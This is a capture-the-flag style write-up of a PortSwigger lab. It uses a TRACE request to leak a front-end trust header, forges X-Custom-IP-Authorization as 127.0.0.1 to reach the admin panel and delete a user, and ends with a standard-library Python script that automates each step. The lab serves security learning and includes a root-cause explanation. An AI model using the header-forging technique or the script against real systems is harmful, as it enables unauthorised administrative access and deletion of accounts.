Authentication bypass via information disclosure
https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-authentication-bypass
This lab's administration interface has an authentication bypass vulnerability, but it is impractical to exploit without knowledge of a custom HTTP header used by the front-end.
To solve the lab, obtain the header name then use it to bypass the lab's authentication. Access the admin interface and delete the user carlos.
You can log in to your own account using the following credentials: wiener:peter
We start by logging in as wiener. The page source contains nothing of interest, so we try the admin interface directly by appending /admin to the URL.
The response discloses a useful piece of information: "Admin interface only available to local users". That tells us the access check depends on where the request appears to come from, so we analyze the request to understand how the front-end tells the back-end who the client is.
One approach is to change the request method and see whether the answer differs. Sending the same request with the TRACE method returns a 200 response. TRACE is a debugging method: the server echoes the request back exactly as it received it, and here the echo includes a header that the front-end added on our behalf: X-Custom-IP-Authorization: 37.101.171.137 (our own public IP address).
The back-end evidently uses this header to decide whether the client is local. We add it ourselves to a GET /admin request with a loopback address, X-Custom-IP-Authorization: 127.0.0.1, and the admin panel loads with permission to delete the user carlos.
The admin panel's HTML contains the link that performs the deletion: GET /admin/delete?username=carlos. Sending that request with the same forged header deletes the account and solves the lab.
The root cause is that the back-end trusts an internal header the front-end was supposed to set, while the front-end neither strips nor overwrites a copy supplied by the client; leaving TRACE enabled then hands the header name to anyone who asks for it. Both are worth checking on any deployment that uses header-based "internal client" checks.
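The procedure above, automated in Python, as an added example that is not part of the original writeup or of PortSwigger's lab code. The script sends a TRACE request, diffs the echoed headers against the ones it sent itself to discover what the front-end injected, picks the injected header whose value is an IP address, then forges it as 127.0.0.1 for /admin and /admin/delete. LAB_HOST is a placeholder for your own lab hostname, the sample TRACE echo is constructed for the offline demo, and the script assumes (as in the walkthrough) that the forged header alone is enough to reach the admin panel; it uses only the standard library.

```python
"""Discover a front-end-injected header via TRACE and forge it to reach /admin."""
import http.client
import ssl
from typing import Dict, Optional

# Placeholder: substitute the hostname of your own lab instance.
LAB_HOST = "YOUR-LAB-ID.web-security-academy.net"

# Everything the client sends itself. Accept-Encoding is listed explicitly so that
# http.client does not add its own copy, which would otherwise show up in the diff.
BASE_HEADERS = {
    "Host": LAB_HOST,
    "User-Agent": "infoleak-bypass/1.0",
    "Accept": "*/*",
    "Accept-Encoding": "identity",
}

# Constructed sample of a TRACE response body (message/http): the request as the
# back-end saw it, with one header the front-end appended. 203.0.113.7 is a
# documentation-range address standing in for the tester's public IP.
SAMPLE_TRACE_ECHO = (
    "TRACE /admin HTTP/1.1\r\n"
    "Host: YOUR-LAB-ID.web-security-academy.net\r\n"
    "User-Agent: infoleak-bypass/1.0\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: identity\r\n"
    "X-Custom-IP-Authorization: 203.0.113.7\r\n"
    "\r\n"
)


def parse_echoed_request(body: str) -> Dict[str, str]:
    """Parse an echoed request into a header map with lower-cased names.

    The first line is the request line and is skipped; parsing stops at the
    blank line that terminates the header block, so any body is ignored.
    """
    headers: Dict[str, str] = {}
    for line in body.replace("\r\n", "\n").split("\n")[1:]:
        if not line.strip():
            break
        if ":" not in line:
            continue  # tolerate stray lines rather than abort the parse
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def injected_headers(sent: Dict[str, str], echoed: Dict[str, str]) -> Dict[str, str]:
    """Return headers present in the echo that the client never sent.

    Whatever remains was appended by the front-end on the way in, which is
    exactly where an internal trust header like X-Custom-IP-Authorization lives.
    """
    sent_names = {name.lower() for name in sent}
    return {name: value for name, value in echoed.items() if name not in sent_names}


def pick_ip_auth_header(injected: Dict[str, str]) -> Optional[str]:
    """Pick the injected header whose value is a dotted-quad IPv4 address, if any."""
    for name, value in injected.items():
        parts = value.split(".")
        if len(parts) == 4 and all(p.isdigit() and int(p) <= 255 for p in parts):
            return name
    return None


def _fetch(conn: http.client.HTTPSConnection, method: str, path: str, headers: Dict[str, str]):
    conn.request(method, path, headers=headers)
    resp = conn.getresponse()
    return resp.status, resp.read().decode(errors="replace")


def solve(host: str = LAB_HOST) -> bool:
    """Run the three live requests against the lab; returns True once carlos is deleted."""
    conn = http.client.HTTPSConnection(host, context=ssl.create_default_context())
    status, body = _fetch(conn, "TRACE", "/admin", BASE_HEADERS)
    if status != 200:
        raise RuntimeError(f"TRACE was not echoed (status {status})")
    name = pick_ip_auth_header(injected_headers(BASE_HEADERS, parse_echoed_request(body)))
    if name is None:
        raise RuntimeError("no front-end IP header found in the TRACE echo")
    forged = dict(BASE_HEADERS, **{name: "127.0.0.1"})  # claim to be a local client
    status, _ = _fetch(conn, "GET", "/admin", forged)
    if status != 200:
        raise RuntimeError(f"/admin still denied with forged {name} (status {status})")
    status, _ = _fetch(conn, "GET", "/admin/delete?username=carlos", forged)
    return status in (200, 302)


if __name__ == "__main__":
    # Offline demo on the constructed echo; call solve() against a real instance.
    found = injected_headers(BASE_HEADERS, parse_echoed_request(SAMPLE_TRACE_ECHO))
    print("front-end injected:", found)
    print("header to forge:", pick_ip_auth_header(found))
```

The diff-against-what-we-sent step is the part worth keeping in your own toolbox: it works for any front-end that appends trust headers (X-Forwarded-For, X-Real-IP, internal role or tenant headers), not just this lab's custom name, and it is why the script lists Accept-Encoding explicitly rather than letting http.client add it silently.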